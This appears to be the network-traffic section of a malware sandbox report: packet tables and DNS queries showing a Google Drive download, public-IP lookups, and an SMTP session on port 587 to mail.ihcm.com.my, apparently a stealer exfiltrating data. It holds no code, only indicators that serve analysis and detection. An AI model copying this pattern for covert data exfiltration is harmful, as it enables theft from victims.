                                                      Oct 24, 2024 08:47:02.423947096 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.468163013 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.468220949 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.468230963 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.468290091 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.468406916 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.468453884 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.468461037 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.468507051 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.468776941 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.468815088 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.468821049 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.468828917 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.468852997 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.468893051 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.469377995 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.469427109 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.469578028 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.469614029 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.469624043 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.469630957 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.469655991 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.469660044 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.469677925 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.469685078 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.469712973 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.469737053 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.470510960 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.470561028 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.470568895 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.470618963 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.470931053 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.470978022 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.472910881 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.472954988 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.473028898 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.473073006 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.478142023 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.478195906 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.478205919 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.478271961 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.482882023 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.483098984 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.483105898 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.483249903 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.486032009 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.486109972 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.486118078 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.486181974 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.489092112 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.489139080 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.489248037 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.489286900 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.492011070 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.492057085 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.492064953 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.492105007 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.495033026 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.495079041 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.495086908 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.495131969 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.498151064 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.498203993 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.498229980 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.498274088 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.501112938 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.501209021 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.501214981 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.501292944 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.503870964 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.503917933 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.503966093 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.504013062 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.506724119 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.506773949 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.506782055 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.506823063 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.509879112 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.509927034 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.509953022 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.509991884 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.512444973 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.512492895 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.512514114 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.512554884 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.515235901 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.515290022 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.515297890 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.515340090 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.518155098 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.518198013 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.518205881 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.518246889 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.520935059 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.520982981 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.521070004 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.521111012 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.523653984 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.523705006 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.523721933 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.523761988 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.526304960 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.526352882 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.526361942 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.526402950 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.528985023 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.529042006 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.529050112 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.529099941 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.531613111 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.531658888 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.532169104 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.532211065 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.534343958 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.534395933 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.534403086 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.534445047 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.537008047 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.537058115 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.537065029 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.537103891 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.539560080 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.539608955 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.539616108 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.539655924 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.542155981 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.542206049 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.542212963 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.542259932 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.544575930 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.544646025 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.544652939 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.544694901 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.547202110 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.547250032 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.547286034 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.547353983 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.587362051 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.587424994 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.587440014 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.587483883 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.587533951 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.587570906 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.587574959 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.587588072 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.587618113 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.587658882 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.587670088 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.587718964 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.587727070 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.587766886 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.588046074 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.588083982 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.588087082 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.588095903 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.588171959 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.588180065 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.588207960 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.588224888 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.588232994 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.588253021 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.588279009 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.588284016 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.588321924 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.589673996 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.589725971 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.589732885 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.589775085 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.590749979 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.590805054 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.591867924 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.591917038 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.591933012 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.591972113 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.596807957 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.596853971 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.596904993 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.596950054 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.598798990 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.598848104 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.601995945 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.602044106 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.602091074 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.602134943 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.604957104 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.605006933 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.605037928 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.605086088 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.608366966 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.608424902 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.608448029 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.608490944 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.611041069 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.611089945 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.611146927 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.611190081 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.614106894 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.614167929 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.614195108 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.614240885 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.617106915 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.617166042 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.617189884 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.617234945 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.619978905 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.620034933 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.620086908 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.620131969 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.623009920 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.623075008 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.623107910 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.623156071 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.625771046 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.625827074 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.625875950 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.625921965 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.628895044 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.628945112 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.628994942 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.629039049 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.629080057 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.629120111 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.629163980 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.629206896 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.629235029 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.629276037 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.629314899 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.629395008 CEST44349881142.250.186.65192.168.2.5
                                                      Oct 24, 2024 08:47:02.629462004 CEST49881443192.168.2.5142.250.186.65
                                                      Oct 24, 2024 08:47:02.988471031 CEST49902443192.168.2.5104.26.12.205
                                                      Oct 24, 2024 08:47:02.988517046 CEST44349902104.26.12.205192.168.2.5
                                                      Oct 24, 2024 08:47:02.988576889 CEST49902443192.168.2.5104.26.12.205
                                                      Oct 24, 2024 08:47:02.990225077 CEST49902443192.168.2.5104.26.12.205
                                                      Oct 24, 2024 08:47:02.990238905 CEST44349902104.26.12.205192.168.2.5
                                                      Oct 24, 2024 08:47:03.617727995 CEST44349902104.26.12.205192.168.2.5
                                                      Oct 24, 2024 08:47:03.618010998 CEST49902443192.168.2.5104.26.12.205
                                                      Oct 24, 2024 08:47:03.619710922 CEST49902443192.168.2.5104.26.12.205
                                                      Oct 24, 2024 08:47:03.619718075 CEST44349902104.26.12.205192.168.2.5
                                                      Oct 24, 2024 08:47:03.620019913 CEST44349902104.26.12.205192.168.2.5
                                                      Oct 24, 2024 08:47:03.623343945 CEST49902443192.168.2.5104.26.12.205
                                                      Oct 24, 2024 08:47:03.671331882 CEST44349902104.26.12.205192.168.2.5
                                                      Oct 24, 2024 08:47:03.795613050 CEST44349902104.26.12.205192.168.2.5
                                                      Oct 24, 2024 08:47:03.795672894 CEST44349902104.26.12.205192.168.2.5
                                                      Oct 24, 2024 08:47:03.795736074 CEST49902443192.168.2.5104.26.12.205
                                                      Oct 24, 2024 08:47:03.799557924 CEST49902443192.168.2.5104.26.12.205
                                                      Oct 24, 2024 08:47:03.810445070 CEST4990980192.168.2.5208.95.112.1
                                                      Oct 24, 2024 08:47:03.815706015 CEST8049909208.95.112.1192.168.2.5
                                                      Oct 24, 2024 08:47:03.815773964 CEST4990980192.168.2.5208.95.112.1
                                                      Oct 24, 2024 08:47:03.815913916 CEST4990980192.168.2.5208.95.112.1
                                                      Oct 24, 2024 08:47:03.821170092 CEST8049909208.95.112.1192.168.2.5
                                                      Oct 24, 2024 08:47:04.423789024 CEST8049909208.95.112.1192.168.2.5
                                                      Oct 24, 2024 08:47:04.524698019 CEST4990980192.168.2.5208.95.112.1
                                                      Oct 24, 2024 08:47:06.120162010 CEST4990980192.168.2.5208.95.112.1
                                                      Oct 24, 2024 08:47:06.125871897 CEST8049909208.95.112.1192.168.2.5
                                                      Oct 24, 2024 08:47:06.125945091 CEST4990980192.168.2.5208.95.112.1
                                                      Oct 24, 2024 08:47:08.876122952 CEST49935587192.168.2.5202.71.109.165
                                                      Oct 24, 2024 08:47:08.881500006 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:08.881573915 CEST49935587192.168.2.5202.71.109.165
                                                      Oct 24, 2024 08:47:09.851226091 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:09.851680040 CEST49935587192.168.2.5202.71.109.165
                                                      Oct 24, 2024 08:47:09.859144926 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:10.769637108 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:10.769804001 CEST49935587192.168.2.5202.71.109.165
                                                      Oct 24, 2024 08:47:10.775161982 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:11.148596048 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:11.149211884 CEST49935587192.168.2.5202.71.109.165
                                                      Oct 24, 2024 08:47:11.156162024 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:11.502639055 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:11.502659082 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:11.502676010 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:11.502737045 CEST49935587192.168.2.5202.71.109.165
                                                      Oct 24, 2024 08:47:11.502902031 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:11.502942085 CEST49935587192.168.2.5202.71.109.165
                                                      Oct 24, 2024 08:47:11.519993067 CEST49935587192.168.2.5202.71.109.165
                                                      Oct 24, 2024 08:47:11.525269032 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:11.869690895 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:11.874674082 CEST49935587192.168.2.5202.71.109.165
                                                      Oct 24, 2024 08:47:11.880018950 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:12.264728069 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:12.265068054 CEST49935587192.168.2.5202.71.109.165
                                                      Oct 24, 2024 08:47:12.270539999 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:12.652955055 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:12.653261900 CEST49935587192.168.2.5202.71.109.165
                                                      Oct 24, 2024 08:47:12.658767939 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:13.073559999 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:13.073848963 CEST49935587192.168.2.5202.71.109.165
                                                      Oct 24, 2024 08:47:13.079220057 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:13.467648029 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:13.467879057 CEST49935587192.168.2.5202.71.109.165
                                                      Oct 24, 2024 08:47:13.473320961 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:14.031557083 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:14.038465977 CEST49935587192.168.2.5202.71.109.165
                                                      Oct 24, 2024 08:47:14.044003010 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:14.427771091 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:14.433924913 CEST49935587192.168.2.5202.71.109.165
                                                      Oct 24, 2024 08:47:14.433971882 CEST49935587192.168.2.5202.71.109.165
                                                      Oct 24, 2024 08:47:14.433986902 CEST49935587192.168.2.5202.71.109.165
                                                      Oct 24, 2024 08:47:14.434000969 CEST49935587192.168.2.5202.71.109.165
                                                      Oct 24, 2024 08:47:14.439412117 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:14.439435959 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:14.439464092 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:14.439474106 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:14.926053047 CEST58749935202.71.109.165192.168.2.5
                                                      Oct 24, 2024 08:47:15.136852026 CEST49935587192.168.2.5202.71.109.165

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 24, 2024 08:46:11.447221994 CEST6491753192.168.2.51.1.1.1
                                                      Oct 24, 2024 08:46:11.454302073 CEST53649171.1.1.1192.168.2.5
                                                      Oct 24, 2024 08:46:12.734814882 CEST5674953192.168.2.51.1.1.1
                                                      Oct 24, 2024 08:46:12.742027044 CEST53567491.1.1.1192.168.2.5
                                                      Oct 24, 2024 08:47:02.969767094 CEST5081453192.168.2.51.1.1.1
                                                      Oct 24, 2024 08:47:02.977385998 CEST53508141.1.1.1192.168.2.5
                                                      Oct 24, 2024 08:47:03.802804947 CEST5454053192.168.2.51.1.1.1
                                                      Oct 24, 2024 08:47:03.809942007 CEST53545401.1.1.1192.168.2.5
                                                      Oct 24, 2024 08:47:06.121185064 CEST5556153192.168.2.51.1.1.1
                                                      Oct 24, 2024 08:47:07.123660088 CEST5556153192.168.2.51.1.1.1
                                                      Oct 24, 2024 08:47:08.122447014 CEST5556153192.168.2.51.1.1.1
                                                      Oct 24, 2024 08:47:08.875303984 CEST53555611.1.1.1192.168.2.5
                                                      Oct 24, 2024 08:47:08.875325918 CEST53555611.1.1.1192.168.2.5
                                                      Oct 24, 2024 08:47:08.875339031 CEST53555611.1.1.1192.168.2.5

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Oct 24, 2024 08:46:11.447221994 CEST192.168.2.51.1.1.10xe740Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:46:12.734814882 CEST192.168.2.51.1.1.10x58d8Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:47:02.969767094 CEST192.168.2.51.1.1.10x5683Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:47:03.802804947 CEST192.168.2.51.1.1.10xb78aStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:47:06.121185064 CEST192.168.2.51.1.1.10x59aStandard query (0)mail.ihcm.com.myA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:47:07.123660088 CEST192.168.2.51.1.1.10x59aStandard query (0)mail.ihcm.com.myA (IP address)IN (0x0001)false
                                                      Oct 24, 2024 08:47:08.122447014 CEST192.168.2.51.1.1.10x59aStandard query (0)mail.ihcm.com.myA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
